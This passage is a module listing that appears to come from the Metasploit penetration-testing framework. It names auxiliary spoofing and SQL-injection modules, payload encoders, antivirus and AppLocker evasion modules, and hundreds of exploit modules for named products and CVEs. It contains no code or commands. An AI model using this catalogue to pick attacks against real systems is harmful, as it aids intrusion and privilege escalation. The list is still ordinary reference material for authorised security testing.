auxiliary/server/local_hwbridge | auxiliary/server/ms15_134_mcl_leak | auxiliary/server/netbios_spoof_nat | auxiliary/server/openssl_altchainsforgery_mitm_proxy | auxiliary/server/openssl_heartbeat_client_memory | auxiliary/server/pxeexploit | auxiliary/server/regsvr32_command_delivery_server | auxiliary/server/socks_proxy | auxiliary/server/socks_unc | auxiliary/server/teamviewer_uri_smb_redirect | auxiliary/server/tftp | auxiliary/server/webkit_xslt_dropper | auxiliary/server/wget_symlink_file_write | auxiliary/server/wpad | . | sniffer (1) . | auxiliary/sniffer/psnuffle | . | spoof (11) . | arp (1) . | auxiliary/spoof/arp/arp_poisoning | . | cisco (2) . | auxiliary/spoof/cisco/cdp | auxiliary/spoof/cisco/dtp | . | dns (4) . 
| auxiliary/spoof/dns/bailiwicked_domain | auxiliary/spoof/dns/bailiwicked_host | auxiliary/spoof/dns/compare_results | auxiliary/spoof/dns/native_spoofer | . | llmnr (1) . | auxiliary/spoof/llmnr/llmnr_response | . | mdns (1) . | auxiliary/spoof/mdns/mdns_response | . | nbns (1) . | auxiliary/spoof/nbns/nbns_response | . | replay (1) . | auxiliary/spoof/replay/pcap_replay | . | . | sqli (19) . | dlink (1) . | auxiliary/sqli/dlink/dlink_central_wifimanager_sqli | . | openemr (1) . | auxiliary/sqli/openemr/openemr_sqli_dump | . | oracle (17) . | auxiliary/sqli/oracle/dbms_cdc_ipublish | auxiliary/sqli/oracle/dbms_cdc_publish | auxiliary/sqli/oracle/dbms_cdc_publish2 | auxiliary/sqli/oracle/dbms_cdc_publish3 | auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription | auxiliary/sqli/oracle/dbms_export_extension | auxiliary/sqli/oracle/dbms_metadata_get_granted_xml | auxiliary/sqli/oracle/dbms_metadata_get_xml | auxiliary/sqli/oracle/dbms_metadata_open | auxiliary/sqli/oracle/droptable_trigger | auxiliary/sqli/oracle/jvm_os_code_10g | auxiliary/sqli/oracle/jvm_os_code_11g | auxiliary/sqli/oracle/lt_compressworkspace | auxiliary/sqli/oracle/lt_findricset_cursor | auxiliary/sqli/oracle/lt_mergeworkspace | auxiliary/sqli/oracle/lt_removeworkspace | auxiliary/sqli/oracle/lt_rollbackworkspace | . | . | voip (6) . | auxiliary/voip/asterisk_login | auxiliary/voip/cisco_cucdm_call_forward | auxiliary/voip/cisco_cucdm_speed_dials | auxiliary/voip/sip_deregister | auxiliary/voip/sip_invite_spoof | auxiliary/voip/telisca_ips_lock_control | . | vsploit (5) . | malware (3) . | dns (3) . | auxiliary/vsploit/malware/dns/dns_mariposa | auxiliary/vsploit/malware/dns/dns_query | auxiliary/vsploit/malware/dns/dns_zeus | . | . | pii (2) . | auxiliary/vsploit/pii/email_pii | auxiliary/vsploit/pii/web_pii | . | . | . | encoder (49) . | cmd (8) . 
| encoder/cmd/base64 | encoder/cmd/brace | encoder/cmd/echo | encoder/cmd/generic_sh | encoder/cmd/ifs | encoder/cmd/perl | encoder/cmd/powershell_base64 | encoder/cmd/printf_php_mq | . | generic (2) . | encoder/generic/eicar | encoder/generic/none | . | mipsbe (2) . | encoder/mipsbe/byte_xori | encoder/mipsbe/longxor | . | mipsle (2) . | encoder/mipsle/byte_xori | encoder/mipsle/longxor | . | php (3) . | encoder/php/base64 | encoder/php/hex | encoder/php/minify | . | ppc (2) . | encoder/ppc/longxor | encoder/ppc/longxor_tag | . | ruby (1) . | encoder/ruby/base64 | . | sparc (1) . | encoder/sparc/longxor_tag | . | x64 (4) . | encoder/x64/xor | encoder/x64/xor_context | encoder/x64/xor_dynamic | encoder/x64/zutto_dekiru | . | x86 (24) . | encoder/x86/add_sub | encoder/x86/alpha_mixed | encoder/x86/alpha_upper | encoder/x86/avoid_underscore_tolower | encoder/x86/avoid_utf8_tolower | encoder/x86/bloxor | encoder/x86/bmp_polyglot | encoder/x86/call4_dword_xor | encoder/x86/context_cpuid | encoder/x86/context_stat | encoder/x86/context_time | encoder/x86/countdown | encoder/x86/fnstenv_mov | encoder/x86/jmp_call_additive | encoder/x86/nonalpha | encoder/x86/nonupper | encoder/x86/opt_sub | encoder/x86/service | encoder/x86/shikata_ga_nai | encoder/x86/single_static_bit | encoder/x86/unicode_mixed | encoder/x86/unicode_upper | encoder/x86/xor_dynamic | encoder/x86/xor_poly | . | . | evasion (9) . | windows (9) . | evasion/windows/applocker_evasion_install_util | evasion/windows/applocker_evasion_msbuild | evasion/windows/applocker_evasion_presentationhost | evasion/windows/applocker_evasion_regasm_regsvcs | evasion/windows/applocker_evasion_workflow_compiler | evasion/windows/process_herpaderping | evasion/windows/syscall_inject | evasion/windows/windows_defender_exe | evasion/windows/windows_defender_js_hta | . | . | exploit (2460) . | aix (5) . | local (3) . 
| exploit/aix/local/ibstat_path | exploit/aix/local/invscout_rpm_priv_esc | exploit/aix/local/xorg_x11_server | . | exploit/aix/rpc_cmsd_opcode21 | exploit/aix/rpc_ttdbserverd_realpath | . | android (10) . | adb (1) . | exploit/android/adb/adb_server_exec | . | browser (3) . | exploit/android/browser/samsung_knox_smdm_url | exploit/android/browser/stagefright_mp4_tx3g_64bit | exploit/android/browser/webview_addjavascriptinterface | . | fileformat (1) . | exploit/android/fileformat/adobe_reader_pdf_js_interface | . | local (5) . | exploit/android/local/binder_uaf | exploit/android/local/futex_requeue | exploit/android/local/janus | exploit/android/local/put_user_vroot | exploit/android/local/su_exec | . | . | apple_ios (6) . | browser (4) . | exploit/apple_ios/browser/safari_jit | exploit/apple_ios/browser/safari_libtiff | exploit/apple_ios/browser/webkit_createthis | exploit/apple_ios/browser/webkit_trident | . | email (1) . | exploit/apple_ios/email/mobilemail_libtiff | . | ssh (1) . | exploit/apple_ios/ssh/cydia_default_ssh | . | . | bsd (1) . | finger (1) . | exploit/bsd/finger/morris_fingerd_bof | . | . | bsdi (1) . | softcart (1) . | exploit/bsdi/softcart/mercantec_softcart | . | . | dialup (1) . | multi (1) . | login (1) . | exploit/dialup/multi/login/manyargs | . | . | . | firefox (1) . | local (1) . | exploit/firefox/local/exec_shellcode | . | . | freebsd (15) . | ftp (1) . | exploit/freebsd/ftp/proftp_telnet_iac | . | http (4) . | exploit/freebsd/http/citrix_dir_traversal_rce | exploit/freebsd/http/citrix_formssso_target_rce | exploit/freebsd/http/junos_phprc_auto_prepend_file | exploit/freebsd/http/watchguard_cmd_exec | . | local (5) . | exploit/freebsd/local/intel_sysret_priv_esc | exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc | exploit/freebsd/local/mmap | exploit/freebsd/local/rtld_execl_priv_esc | exploit/freebsd/local/watchguard_fix_corrupt_mail | . | misc (1) . | exploit/freebsd/misc/citrix_netscaler_soap_bof | . | samba (1) . 
| exploit/freebsd/samba/trans2open | . | tacacs (1) . | exploit/freebsd/tacacs/xtacacsd_report | . | telnet (1) . | exploit/freebsd/telnet/telnet_encrypt_keyid | . | webapp (1) . | exploit/freebsd/webapp/spamtitan_unauth_rce | . | . | hpux (1) . | lpd (1) . | exploit/hpux/lpd/cleanup_exec | . | . | irix (1) . | lpd (1) . | exploit/irix/lpd/tagprinter_exec | . | . | linux (486) . | antivirus (1) . | exploit/linux/antivirus/escan_password_exec | . | browser (1) . | exploit/linux/browser/adobe_flashplayer_aslaunch | . | fileformat (1) . | exploit/linux/fileformat/unrar_cve_2022_30333 | . | ftp (2) . | exploit/linux/ftp/proftp_sreplace | exploit/linux/ftp/proftp_telnet_iac | . | games (1) . | exploit/linux/games/ut2004_secure | . | http (304) . | exploit/linux/http/accellion_fta_getstatus_oauth | exploit/linux/http/acronis_cyber_infra_cve_2023_45249 | exploit/linux/http/advantech_switch_bash_env_exec | exploit/linux/http/airties_login_cgi_bof | exploit/linux/http/alcatel_omnipcx_mastercgi_exec | exploit/linux/http/alienvault_exec | exploit/linux/http/alienvault_sqli_exec | exploit/linux/http/apache_airflow_dag_rce | exploit/linux/http/apache_continuum_cmd_exec | exploit/linux/http/apache_couchdb_cmd_exec | exploit/linux/http/apache_druid_js_rce | exploit/linux/http/apache_hugegraph_gremlin_rce | exploit/linux/http/apache_nifi_h2_rce | exploit/linux/http/apache_ofbiz_deserialization | exploit/linux/http/apache_ofbiz_deserialization_soap | exploit/linux/http/apache_solr_backup_restore | exploit/linux/http/apache_spark_rce_cve_2022_33891 | exploit/linux/http/apache_superset_cookie_sig_rce | exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection | exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054 | exploit/linux/http/astium_sqli_upload | exploit/linux/http/asuswrt_lan_rce | exploit/linux/http/atutor_filemanager_traversal | exploit/linux/http/axis_app_install | exploit/linux/http/axis_srv_parhand_rce | exploit/linux/http/belkin_login_bof | 
exploit/linux/http/bitbucket_git_cmd_injection | exploit/linux/http/bludit_upload_images_exec | exploit/linux/http/cacti_unauthenticated_cmd_injection | exploit/linux/http/cayin_cms_ntp | exploit/linux/http/centreon_pollers_auth_rce | exploit/linux/http/centreon_sqli_exec | exploit/linux/http/centreon_useralias_exec | exploit/linux/http/cfme_manageiq_evm_upload_exec | exploit/linux/http/chamilo_unauth_rce_cve_2023_34960 | exploit/linux/http/chaos_rat_xss_to_rce | exploit/linux/http/cisco_asax_sfr_rce | exploit/linux/http/cisco_firepower_useradd | exploit/linux/http/cisco_hyperflex_file_upload_rce | exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec | exploit/linux/http/cisco_prime_inf_rce | exploit/linux/http/cisco_rv32x_rce | exploit/linux/http/cisco_rv340_lan | exploit/linux/http/cisco_rv_series_authbypass_and_rce | exploit/linux/http/cisco_ucs_cloupia_script_rce | exploit/linux/http/cisco_ucs_rce | exploit/linux/http/control_web_panel_login_cmd_exec | exploit/linux/http/cpi_tararchive_upload | exploit/linux/http/craftcms_unauth_rce_cve_2023_41892 | exploit/linux/http/crypttech_cryptolog_login_exec | exploit/linux/http/cve_2019_1663_cisco_rmi_rce | exploit/linux/http/dcos_marathon | exploit/linux/http/ddwrt_cgibin_exec | exploit/linux/http/denyall_waf_exec | exploit/linux/http/dlink_authentication_cgi_bof | exploit/linux/http/dlink_command_php_exec_noauth | exploit/linux/http/dlink_dcs931l_upload | exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution | exploit/linux/http/dlink_diagnostic_exec_noauth | exploit/linux/http/dlink_dir300_exec_telnet | exploit/linux/http/dlink_dir605l_captcha_bof | exploit/linux/http/dlink_dir615_up_exec | exploit/linux/http/dlink_dir850l_unauth_exec | exploit/linux/http/dlink_dsl2750b_exec_noauth | exploit/linux/http/dlink_dspw110_cookie_noauth_exec | exploit/linux/http/dlink_dspw215_info_cgi_bof | exploit/linux/http/dlink_dwl_2600_command_injection | exploit/linux/http/dlink_hedwig_cgi_bof | 
exploit/linux/http/dlink_hnap_bof | exploit/linux/http/dlink_hnap_header_exec_noauth | exploit/linux/http/dlink_hnap_login_bof | exploit/linux/http/dlink_upnp_exec_noauth | exploit/linux/http/dnalims_admin_exec | exploit/linux/http/docker_daemon_tcp | exploit/linux/http/dolibarr_cmd_exec | exploit/linux/http/dreambox_openpli_shell | exploit/linux/http/efw_chpasswd_exec | exploit/linux/http/elfinder_archive_cmd_injection | exploit/linux/http/empire_skywalker | exploit/linux/http/esva_exec | exploit/linux/http/eyesofnetwork_autodiscovery_rce | exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 | exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747 | exploit/linux/http/f5_icall_cmd | exploit/linux/http/f5_icontrol_exec | exploit/linux/http/f5_icontrol_rce | exploit/linux/http/f5_icontrol_rest_ssrf_rce | exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800 | exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 | exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061 | exploit/linux/http/foreman_openstack_satellite_code_exec | exploit/linux/http/fortinac_keyupload_file_write | exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 | exploit/linux/http/fritzbox_echo_exec | exploit/linux/http/froxlor_log_path_rce | exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx | exploit/linux/http/geutebruck_instantrec_bof | exploit/linux/http/geutebruck_testaction_exec | exploit/linux/http/github_enterprise_secret | exploit/linux/http/gitlist_exec | exploit/linux/http/glinet_unauth_rce_cve_2023_50445 | exploit/linux/http/glpi_htmlawed_php_injection | exploit/linux/http/goahead_ldpreload | exploit/linux/http/goautodial_3_rce_command_injection | exploit/linux/http/gpsd_format_string | exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec | exploit/linux/http/grandstream_ucm62xx_sendemail_rce | exploit/linux/http/gravcms_exec | exploit/linux/http/groundwork_monarch_cmd_exec | exploit/linux/http/h2_webinterface_rce | 
exploit/linux/http/hadoop_unauth_exec | exploit/linux/http/hikvision_cve_2021_36260_blind | exploit/linux/http/hp_system_management | exploit/linux/http/hp_van_sdn_cmd_inject | exploit/linux/http/huawei_hg532n_cmdinject | exploit/linux/http/ibm_drm_rce | exploit/linux/http/ibm_qradar_unauth_rce | exploit/linux/http/imperva_securesphere_exec | exploit/linux/http/ipfire_bashbug_exec | exploit/linux/http/ipfire_oinkcode_exec | exploit/linux/http/ipfire_pakfire_exec | exploit/linux/http/ipfire_proxy_exec | exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805 | exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893 | exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529 | exploit/linux/http/ivanti_sentry_misc_log_service | exploit/linux/http/jenkins_cli_deserialization | exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251 | exploit/linux/http/kaltura_unserialize_cookie_rce | exploit/linux/http/kaltura_unserialize_rce | exploit/linux/http/kibana_timelion_prototype_pollution_rce | exploit/linux/http/kibana_upgrade_assistant_telemetry_rce | exploit/linux/http/klog_server_authenticate_user_unauth_command_injection | exploit/linux/http/kloxo_sqli | exploit/linux/http/lexmark_faxtrace_settings | exploit/linux/http/librenms_addhost_cmd_inject | exploit/linux/http/librenms_collectd_cmd_inject | exploit/linux/http/lifesize_uvc_ping_rce | exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256 | exploit/linux/http/linksys_apply_cgi | exploit/linux/http/linksys_e1500_apply_exec | exploit/linux/http/linksys_themoon_exec | exploit/linux/http/linksys_wrt110_cmd_exec | exploit/linux/http/linksys_wrt160nv2_apply_exec | exploit/linux/http/linksys_wrt54gl_apply_exec | exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth | exploit/linux/http/linuxki_rce | exploit/linux/http/logsign_exec | exploit/linux/http/lucee_admin_imgprocess_file_write | exploit/linux/http/magento_xxe_to_glibc_buf_overflow | exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 | 
exploit/linux/http/mailcleaner_exec | exploit/linux/http/majordomo_cmd_inject_cve_2023_50917 | exploit/linux/http/metabase_setup_token_rce | exploit/linux/http/microfocus_obr_cmd_injection | exploit/linux/http/microfocus_secure_messaging_gateway | exploit/linux/http/mida_solutions_eframework_ajaxreq_rce | exploit/linux/http/mobileiron_core_log4shell | exploit/linux/http/mobileiron_mdm_hessian_rce | exploit/linux/http/multi_ncc_ping_exec | exploit/linux/http/mutiny_frontend_upload | exploit/linux/http/mvpower_dvr_shell_exec | exploit/linux/http/nagios_xi_autodiscovery_webshell | exploit/linux/http/nagios_xi_chained_rce | exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo | exploit/linux/http/nagios_xi_configwizards_authenticated_rce | exploit/linux/http/nagios_xi_magpie_debug | exploit/linux/http/nagios_xi_mibs_authenticated_rce | exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce | exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce | exploit/linux/http/nagios_xi_snmptrap_authenticated_rce | exploit/linux/http/netgear_dgn1000_setup_unauth_exec | exploit/linux/http/netgear_dgn1000b_setup_exec | exploit/linux/http/netgear_dgn2200b_pppoe_exec | exploit/linux/http/netgear_dnslookup_cmd_exec | exploit/linux/http/netgear_r7000_cgibin_exec | exploit/linux/http/netgear_readynas_exec | exploit/linux/http/netgear_unauth_exec | exploit/linux/http/netgear_wnr2000_rce | exploit/linux/http/netis_unauth_rce_cve_2024_22729 | exploit/linux/http/netsweeper_webadmin_unixlogin | exploit/linux/http/nexus_repo_manager_el_injection | exploit/linux/http/nginx_chunked_size | exploit/linux/http/nuuo_nvrmini_auth_rce | exploit/linux/http/nuuo_nvrmini_unauth_rce | exploit/linux/http/op5_config_exec | exploit/linux/http/openfiler_networkcard_exec | exploit/linux/http/openmetadata_auth_bypass_rce | exploit/linux/http/opennms_horizon_authenticated_rce | exploit/linux/http/opentsdb_key_cmd_injection | exploit/linux/http/opentsdb_yrange_cmd_injection | 
exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276 | exploit/linux/http/oracle_ebs_rce_cve_2022_21587 | exploit/linux/http/pandora_fms_events_exec | exploit/linux/http/pandora_fms_exec | exploit/linux/http/pandora_fms_sqli | exploit/linux/http/pandora_ping_cmd_exec | exploit/linux/http/panos_op_cmd_exec | exploit/linux/http/panos_readsessionvars | exploit/linux/http/panos_telemetry_cmd_exec | exploit/linux/http/peercast_url | exploit/linux/http/php_imap_open_rce | exploit/linux/http/pineapp_ldapsyncnow_exec | exploit/linux/http/pineapp_livelog_exec | exploit/linux/http/pineapp_test_li_conn_exec | exploit/linux/http/pineapple_bypass_cmdinject | exploit/linux/http/pineapple_preconfig_cmdinject | exploit/linux/http/piranha_passwd_exec | exploit/linux/http/progress_flowmon_unauth_cmd_injection | exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection | exploit/linux/http/pulse_secure_cmd_exec | exploit/linux/http/pulse_secure_gzip_rce | exploit/linux/http/pyload_js2py_exec | exploit/linux/http/qnap_qcenter_change_passwd_exec | exploit/linux/http/qnap_qts_rce_cve_2023_47218 | exploit/linux/http/raidsonic_nas_ib5220_exec_noauth | exploit/linux/http/railo_cfml_rfi | exploit/linux/http/rancher_server | exploit/linux/http/ray_agent_job_rce | exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019 | exploit/linux/http/rconfig_ajaxarchivefiles_rce | exploit/linux/http/rconfig_vendors_auth_file_upload_rce | exploit/linux/http/realtek_miniigd_upnp_exec_noauth | exploit/linux/http/riverbed_netprofiler_netexpress_exec | exploit/linux/http/roxy_wi_exec | exploit/linux/http/saltstack_salt_api_cmd_exec | exploit/linux/http/saltstack_salt_wheel_async_rce | exploit/linux/http/samsung_srv_1670d_upload_exec | exploit/linux/http/seagate_nas_php_exec_noauth | exploit/linux/http/smt_ipmi_close_window_bof | exploit/linux/http/solarview_unauth_rce_cve_2023_23333 | exploit/linux/http/sonicwall_cve_2021_20039 | exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection | 
exploit/linux/http/sophos_wpa_iface_exec | exploit/linux/http/sophos_wpa_sblistpack_exec | exploit/linux/http/sourcegraph_gitserver_sshcmd | exploit/linux/http/spark_unauth_rce | exploit/linux/http/spring_cloud_gateway_rce | exploit/linux/http/suitecrm_log_file_rce | exploit/linux/http/supervisor_xmlrpc_exec | exploit/linux/http/symantec_messaging_gateway_exec | exploit/linux/http/symantec_web_gateway_exec | exploit/linux/http/symantec_web_gateway_file_upload | exploit/linux/http/symantec_web_gateway_lfi | exploit/linux/http/symantec_web_gateway_pbcontrol | exploit/linux/http/symantec_web_gateway_restore | exploit/linux/http/symmetricom_syncserver_rce | exploit/linux/http/synology_dsm_sliceupload_exec_noauth | exploit/linux/http/synology_dsm_smart_exec_auth | exploit/linux/http/terramaster_unauth_rce_cve_2020_35665 | exploit/linux/http/terramaster_unauth_rce_cve_2021_45837 | exploit/linux/http/terramaster_unauth_rce_cve_2022_24990 | exploit/linux/http/tiki_calendar_exec | exploit/linux/http/totolink_unauth_rce_cve_2023_30013 | exploit/linux/http/tp_link_ncxxx_bonjour_command_injection | exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection | exploit/linux/http/tr064_ntpserver_cmdinject | exploit/linux/http/traccar_rce_upload | exploit/linux/http/trend_micro_imsva_exec | exploit/linux/http/trendmicro_imsva_widget_exec | exploit/linux/http/trendmicro_sps_exec | exploit/linux/http/trendmicro_websecurity_exec | exploit/linux/http/trueonline_billion_5200w_rce | exploit/linux/http/trueonline_p660hn_v1_rce | exploit/linux/http/trueonline_p660hn_v2_rce | exploit/linux/http/ubiquiti_airos_file_upload | exploit/linux/http/ueb_api_rce | exploit/linux/http/unraid_auth_bypass_exec | exploit/linux/http/vap2500_tools_command_exec | exploit/linux/http/vcms_upload | exploit/linux/http/vestacp_exec | exploit/linux/http/vinchin_backup_recovery_cmd_inject | exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 | exploit/linux/http/vmware_vcenter_analytics_file_upload 
| exploit/linux/http/vmware_vcenter_vsan_health_rce | exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce | exploit/linux/http/vmware_vrli_rce | exploit/linux/http/vmware_vrni_rce_cve_2023_20887 | exploit/linux/http/vmware_vrops_mgr_ssrf_rce | exploit/linux/http/vmware_workspace_one_access_cve_2022_22954 | exploit/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain | exploit/linux/http/wanem_exec | exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318 | exploit/linux/http/wd_mycloud_multiupload_upload | exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection | exploit/linux/http/webcalendar_settings_exec | exploit/linux/http/webid_converter | exploit/linux/http/webmin_backdoor | exploit/linux/http/webmin_file_manager_rce | exploit/linux/http/webmin_package_updates_rce | exploit/linux/http/webmin_packageup_rce | exploit/linux/http/wepresent_cmd_injection | exploit/linux/http/wipg1000_cmd_injection | exploit/linux/http/xplico_exec | exploit/linux/http/zabbix_sqli | exploit/linux/http/zen_load_balancer_exec | exploit/linux/http/zenoss_showdaemonxmlconfig_exec | exploit/linux/http/zimbra_cpio_cve_2022_41352 | exploit/linux/http/zimbra_mboximport_cve_2022_27925 | exploit/linux/http/zimbra_unrar_cve_2022_30333 | exploit/linux/http/zimbra_xxe_rce | exploit/linux/http/zyxel_lfi_unauth_ssh_rce | exploit/linux/http/zyxel_parse_config_rce | exploit/linux/http/zyxel_ztp_rce | . | ids (2) . | exploit/linux/ids/alienvault_centerd_soap_exec | exploit/linux/ids/snortbopre | . | imap (1) . | exploit/linux/imap/imap_uw_lsub | . | local (91) . 
| exploit/linux/local/abrt_raceabrt_priv_esc | exploit/linux/local/abrt_sosreport_priv_esc | exploit/linux/local/af_packet_chocobo_root_priv_esc | exploit/linux/local/af_packet_packet_set_ring_priv_esc | exploit/linux/local/ansible_node_deployer | exploit/linux/local/apport_abrt_chroot_priv_esc | exploit/linux/local/apt_package_manager_persistence | exploit/linux/local/asan_suid_executable_priv_esc | exploit/linux/local/autostart_persistence | exploit/linux/local/bash_profile_persistence | exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc | exploit/linux/local/bpf_priv_esc | exploit/linux/local/bpf_sign_extension_priv_esc | exploit/linux/local/cpi_runrshell_priv_esc | exploit/linux/local/cron_persistence | exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe | exploit/linux/local/cve_2021_3493_overlayfs | exploit/linux/local/cve_2021_38648_omigod | exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec | exploit/linux/local/cve_2022_0847_dirtypipe | exploit/linux/local/cve_2022_0995_watch_queue | exploit/linux/local/cve_2022_1043_io_uring_priv_esc | exploit/linux/local/cve_2023_0386_overlayfs_priv_esc | exploit/linux/local/desktop_privilege_escalation | exploit/linux/local/diamorphine_rootkit_signal_priv_esc | exploit/linux/local/docker_cgroup_escape | exploit/linux/local/docker_daemon_privilege_escalation | exploit/linux/local/docker_privileged_container_escape | exploit/linux/local/docker_privileged_container_kernel_escape | exploit/linux/local/docker_runc_escape | exploit/linux/local/exim4_deliver_message_priv_esc | exploit/linux/local/f5_create_user | exploit/linux/local/glibc_ld_audit_dso_load_priv_esc | exploit/linux/local/glibc_origin_expansion_priv_esc | exploit/linux/local/glibc_realpath_priv_esc | exploit/linux/local/glibc_tunables_priv_esc | exploit/linux/local/hp_smhstart | exploit/linux/local/hp_xglance_priv_esc | exploit/linux/local/juju_run_agent_priv_esc | exploit/linux/local/kloxo_lxsuexec | exploit/linux/local/ktsuss_suid_priv_esc | 
exploit/linux/local/lastore_daemon_dbus_priv_esc | exploit/linux/local/libuser_roothelper_priv_esc | exploit/linux/local/motd_persistence | exploit/linux/local/nested_namespace_idmap_limit_priv_esc | exploit/linux/local/netfilter_nft_set_elem_init_privesc | exploit/linux/local/netfilter_priv_esc_ipv4 | exploit/linux/local/netfilter_xtables_heap_oob_write_priv_esc | exploit/linux/local/network_manager_vpnc_username_priv_esc | exploit/linux/local/ntfs3g_priv_esc | exploit/linux/local/omniresolve_suid_priv_esc | exploit/linux/local/overlayfs_priv_esc | exploit/linux/local/pihole_remove_commands_lpe | exploit/linux/local/pkexec | exploit/linux/local/polkit_dbus_auth_bypass | exploit/linux/local/progress_flowmon_sudo_privesc_2024 | exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024 | exploit/linux/local/ptrace_sudo_token_priv_esc | exploit/linux/local/ptrace_traceme_pkexec_helper | exploit/linux/local/rc_local_persistence | exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc | exploit/linux/local/rds_rds_page_copy_user_priv_esc | exploit/linux/local/recvmmsg_priv_esc | exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc | exploit/linux/local/runc_cwd_priv_esc | exploit/linux/local/saltstack_salt_minion_deployer | exploit/linux/local/service_persistence | exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc | exploit/linux/local/sock_sendpage | exploit/linux/local/sophos_wpa_clear_keys | exploit/linux/local/su_login | exploit/linux/local/sudo_baron_samedit | exploit/linux/local/sudoedit_bypass_priv_esc | exploit/linux/local/systemtap_modprobe_options_priv_esc | exploit/linux/local/tomcat_rhel_based_temp_priv_esc | exploit/linux/local/tomcat_ubuntu_log_init_priv_esc | exploit/linux/local/ubuntu_enlightenment_mount_priv_esc | exploit/linux/local/udev_netlink | exploit/linux/local/ueb_bpserverd_privesc | exploit/linux/local/ufo_privilege_escalation | exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc | 
exploit/linux/local/vmware_alsa_config | exploit/linux/local/vmware_mount | exploit/linux/local/vmware_workspace_one_access_certproxy_lpe | exploit/linux/local/vmware_workspace_one_access_cve_2022_22960 | exploit/linux/local/vmwgfx_fd_priv_esc | exploit/linux/local/yum_package_manager_persistence | exploit/linux/local/zimbra_postfix_priv_esc | exploit/linux/local/zimbra_slapper_priv_esc | exploit/linux/local/zpanel_zsudo | exploit/linux/local/zyxel_suid_cp_lpe | . | misc (41) . | exploit/linux/misc/accellion_fta_mpipe2 | exploit/linux/misc/aerospike_database_udf_cmd_exec | exploit/linux/misc/asus_infosvr_auth_bypass_exec | exploit/linux/misc/cisco_ios_xe_rce | exploit/linux/misc/cisco_rv340_sslvpn | exploit/linux/misc/cve_2020_13160_anydesk | exploit/linux/misc/cve_2021_38647_omigod | exploit/linux/misc/gld_postfix | exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce | exploit/linux/misc/hikvision_rtsp_bof | exploit/linux/misc/hp_data_protector_cmd_exec | exploit/linux/misc/hp_jetdirect_path_traversal | exploit/linux/misc/hp_nnmi_pmd_bof | exploit/linux/misc/hp_vsa_login_bof | exploit/linux/misc/hplip_hpssd_exec | exploit/linux/misc/ib_inet_connect | exploit/linux/misc/ib_jrd8_create_database | exploit/linux/misc/ib_open_marker_file | exploit/linux/misc/ib_pwd_db_aliased | exploit/linux/misc/igel_command_injection | exploit/linux/misc/jenkins_java_deserialize | exploit/linux/misc/jenkins_ldap_deserialize | exploit/linux/misc/lprng_format_string | exploit/linux/misc/mongod_native_helper | exploit/linux/misc/nagios_nrpe_arguments | exploit/linux/misc/netcore_udp_53413_backdoor | exploit/linux/misc/netsupport_manager_agent | exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec | exploit/linux/misc/novell_edirectory_ncp_bof | exploit/linux/misc/opennms_java_serialize | exploit/linux/misc/qnap_transcode_server | exploit/linux/misc/quest_pmmasterd_bof | exploit/linux/misc/saltstack_salt_unauth_rce | exploit/linux/misc/sercomm_exec | 
exploit/linux/misc/tplink_archer_a7_c7_lan_rce | exploit/linux/misc/ueb9_bpserverd | exploit/linux/misc/unidata_udadmin_auth_bypass | exploit/linux/misc/unidata_udadmin_password_stack_overflow | exploit/linux/misc/zabbix_server_exec | exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771 | exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce | . | mysql (2) . | exploit/linux/mysql/mysql_yassl_getname | exploit/linux/mysql/mysql_yassl_hello | . | pop3 (1) . | exploit/linux/pop3/cyrus_pop3d_popsubfolders | . | postgres (1) . | exploit/linux/postgres/postgres_payload | . | pptp (1) . | exploit/linux/pptp/poptop_negative_read | . | proxy (1) . | exploit/linux/proxy/squid_ntlm_authenticate | . | redis (2) . | exploit/linux/redis/redis_debian_sandbox_escape | exploit/linux/redis/redis_replication_cmd_exec | . | samba (5) . | exploit/linux/samba/chain_reply | exploit/linux/samba/is_known_pipename | exploit/linux/samba/lsa_transnames_heap | exploit/linux/samba/setinfopolicy_heap | exploit/linux/samba/trans2open | . | smtp (4) . | exploit/linux/smtp/apache_james_exec | exploit/linux/smtp/exim4_dovecot_exec | exploit/linux/smtp/exim_gethostbyname_bof | exploit/linux/smtp/haraka | . | snmp (2) . | exploit/linux/snmp/awind_snmp_exec | 